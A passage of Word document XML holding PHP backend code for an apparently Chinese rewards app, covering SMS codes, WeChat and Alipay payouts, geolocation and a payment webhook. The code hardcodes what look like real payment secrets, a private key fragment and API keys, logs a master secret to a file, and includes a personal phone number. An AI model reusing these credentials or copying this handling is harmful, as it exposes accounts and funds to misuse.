      </w:r>
    </w:p>
    <w:p w14:paraId="3ECC59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827D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Post()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B0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post.username', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AE7B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input('post.text', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC910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_code($username, $text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B813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 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EA7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okie('code', time() + 120, 120);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F1B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520199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发送成功，验证码有效期</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226775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235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4A2FB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B933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code,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA5F3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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7394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19E5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86C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061B15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104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9D1B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ingxi()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B3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CFF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76F89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put('typeid/d')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3961A1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id'] = input('typeid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7183A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19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shoplist')-&gt;field('id,title,image,jinbi,money')-&gt;where($where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030D94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3B10A9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jinbi'] = $v['jinbi'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09491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money'] = $v['money'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530F1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image'] = _imgUrl() . $v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED8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0AF4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data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4F97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4E7688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login_money = 100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3466C1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1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65106A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_login = _moneyDb(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D83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CA7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5776CA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money' =&gt; $money_login_money, 'content' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币赠送</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 'type' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0335A2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B8C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7F8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money_login);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAE8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246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eshi()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24228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9A2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shoplist_records')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20086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fetchSql(true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DACB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group('uid')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66436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having('count(id)&gt;3')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44201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desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F49B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10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B03C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B3489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data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79984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BAC2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serList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C79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AF4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ost.pages/d') ? input('post.pages/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F514A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hide'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9650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4D953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ARTICLE__ w', 'a.id=w.uid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072B9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36C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gt;where($where)-&gt;alias('a')-&gt;join($join)-&gt;field('a.id')-&gt;order('a.id desc')-&gt;fetchSql(false)-&gt;paginate(100)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB84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241D5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id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EA9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2A3EB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901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data['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD4A2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6FF4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y()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF71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F612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362B2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eecloud\rest\api::registerApp('df051f1c-e9d3-4656-91bb-717346ed8dfc', '3b592873-9cc6-46c6-a3e7-a03883580d58', '91b0005a-61a5-48d2-a622-1031f090b531', 'dd58dd3b-da20-40b7-9e15-907b2555c35e');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3093FF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8B12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stamp' =&gt; time() * 1000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA06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 =&gt; 'WX_TRANSFER',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F4E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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>微信企业打款</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">',   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769484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ansfer_no' =&gt; "bcdemo" . time(),    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB95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fee' =&gt; 1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD7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nel_user_id' =&gt; 'o3kKrjlROJ1qlDmFdlBQA95zxxx'   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0DCC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6751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beecloud\rest\api::transfer($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB908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sult-&gt;result_code != 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7F3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_r($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B325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460C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713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 </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>打款成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52686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Exception $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C4F9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e-&gt;getMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A69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6CE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74C2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lipay()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00452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97A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er::import('alipay.aop.AopClient', EXTEND_PATH, '.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C49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er::import('alipay.aop.request.AlipayFundTransToaccountTransferRequest', EXTEND_PATH, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>'.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B89D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er::import('alipay.aop.SignData', EXTEND_PATH, '.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611BA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userWithDraw();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E34E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4FA88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F9B1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17E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er </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一秋</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE18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74C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userid          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E662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out_biz_no      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A8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payee_account   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提现的支付宝账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D5BF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amount          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>转账金额</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341D0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payee_real_name </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号的真实姓名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5806FC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FF1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bool|Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9CA3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38DC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userWithDraw($userid = 1, $out_biz_no = '', $payee_account = '12385@163.com', $amount = 1, $payee_real_name = '123</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>翔</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37704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A7E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ut_biz_no = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B4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er_show_name = '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户红包提现</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A9D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 = '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>红包提现到支付宝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8FBF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 = new \AopClient();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AE0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC8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atewayUrl' =&gt; 'https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBA3F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gt; '201811931182',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3012D2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saPrivateKey' =&gt; 'MIIEowIBQEAuBibpO/ICQg9yBzVmGfKQxiL7PRAb8Sf+cG0lKC0PCXkx7IwPy/2UFVk5COlY1AchUibYBbIrL1z2R9TMmtCyrLy9eury3ELjDiy/qMEYtmeRSDLhn0wsHx3VLxJFw2pjbPfxfim47lh+AjI9KTv67HtJT0Lbjhb9O6svvQusg+DF87Z95/d6WT9YOgfp39Ok3USw8NO7Wr/PK2a8E8No',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D22A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CDA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gatewayUrl = $config['gatewayUrl'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E2A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appId = $config['appId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A49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rsaPrivateKey = $config['rsaPrivateKey'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A21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alipayrsaPublicKey = $config['alipayrsaPublicKey'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C0C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apiVersion = '1.0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F54E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signType = 'RSA2';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176D3E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postCharset = 'utf-8';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551508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op-&gt;format = 'json';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E107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new \AlipayFundTransToaccountTransferRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF30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gt;setBizContent("{" .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60716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ut_biz_no\":\"$out_biz_no\"," .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795649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ee_type\":\"ALIPAY_LOGONID\"," .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E60F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ee_account\":\"$payee_account\"," .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699D2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mount\":\"$amount\"," .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C97F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er_show_name\":\"$payer_show_name\"," .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD58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yee_real_name\":\"$payee_real_name\"," .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2688F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remark\"" .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CE2A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40FA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aop-&gt;execute($request);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E9A6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result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B1B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sponseNode = str_replace(".", "_", $request-&gt;getApiMethodName()) . "_response";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8CE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Code = $result-&gt;$responseNode-&gt;code;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D901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resultCode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B80E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resultCode) &amp;&amp; $resultCode == 10000) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF61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0DE6A9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50EBB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2DBD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DB0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ityDingwei()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371DB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FC6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titude = input('latitude') ? input('latitude') : '39.904214';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF6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ngitude = input('longitude') ? input('longitude') : '116.40741300000002';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A739B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longitude . ',' . $latitude;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20293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latitude || !$longitude) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FB5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D22E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170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3cf31d82a4e39b85226519b62471fa10';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E33C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file_get_contents('https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B0E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json_decode($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58838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status'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AF4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empty($data['regeocode']['addressComponent']['city']) ? $data['regeocode']['addressComponent']['city'] : $data['regeocode']['addressComponent']['province'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06968C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str_replace('</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>市</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', '', $city);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C81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city]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214650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8F2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0D1F8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titude = input('latitude') ? input('latitude') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D10D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ngitude = input('longitude') ? input('longitude') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD83F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Data = file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FBFB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tData = json_decode($getData, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F80D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getData['status'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643C8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getData['result']['addressComponent']['city'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01248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ty = str_replace('</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>市</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', '', $city);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EF0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city]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791CF3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B614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4C7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ncrypt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ED5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2FC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mobile' =&gt; '15622289461'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B8F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member['id'] . '|www.ffxiang.cn|' . $member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2625FC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_encrypt($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A564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C067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53F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支付通知处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72756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010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type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6CC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424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notifyWebhook()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6802A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39E2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ransaction(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB879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Id = '0bb64709-660c-46ab-b408-30c851315139';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13279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asterSecret = '31377893-2f54-44d8-bf30-49a081acb031';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BD00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sonStr = file_get_contents("php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD2A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sg = json_decode($jsonStr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE50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ign = md5($appId . $msg-&gt;transaction_id . $msg-&gt;transaction_type . $msg-&gt;channel_type . $msg-&gt;transaction_fee . $masterSecret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575CE9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ign != $msg-&gt;signature) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226E0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sg'] = $msg;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F79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p'] = _ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F863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ign'] = $sign;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0E3E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ignature'] = $msg-&gt;signature;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7E5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ppId'] = $appId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46182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asterSecret'] = $masterSecret;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D62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notifyWebhook.txt", var_export($data, true) . "\r\n=====================================================================\r\n\r\n=====================================================================\r\n", FILE_APPEND);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AA30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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>头条开发</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>QQ</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1424445608');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790363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12067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msg-&gt;transaction_type == "PAY") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCBB3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 = $msg-&gt;trade_success;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAC14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atus) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8F01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2282F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B26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58372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de'] = $msg-&gt;transaction_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AB4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msg-&gt;transaction_fee;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6179A3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msg-&gt;optional-&gt;uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127ED4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 = $msg-&gt;sub_channel_type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BB6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tatus'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE56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pay_record')-&gt;where($where)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64195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A6C39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ay_record')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE3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b['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D231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74AEF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 =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781324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time' =&gt; time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11613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gt; $jsonStr,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A47CD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943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sg-&gt;optional-&gt;dizhiId)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F3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izhiId'] = $msg-&gt;optional-&gt;dizhiId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178C9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250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his-&gt;memberData($db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED54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BD3B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9414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ECD6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F57F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memberData($db)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3394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CAC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9B2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gt; $db['uid']])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBA9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hibo_zuan', $db['money'] / 100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A64B7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success';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D8AD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773F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2B46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index/image_upload </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传图片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224278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上传图片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B259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1C864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6ADA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File} image       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传图片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBB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25207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age   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>七牛图片文件名（</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eg. 042e820210812091212723761.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CD7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preview </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>预览图片</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE3E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上传失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF82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3CA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age_upload()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C215A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9BE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file('image')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252735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6C4DC9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7F476A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71DAE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11DF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03B43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34436F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220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CA0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0BFE4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 = ['jpg', 'png', 'gif', 'jpeg', 'JPEG', 'JPG', 'GIF', 'PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34173B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_array($ext, $geshi)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4639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322D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1A97D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DF33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C5A4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4D0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substr(md5($file-&gt;getRealPath()), 0, 5) . date('YmdHis') . rand(100, 999999) . '.jpg';</w:t>
      </w:r>
    </w:p>
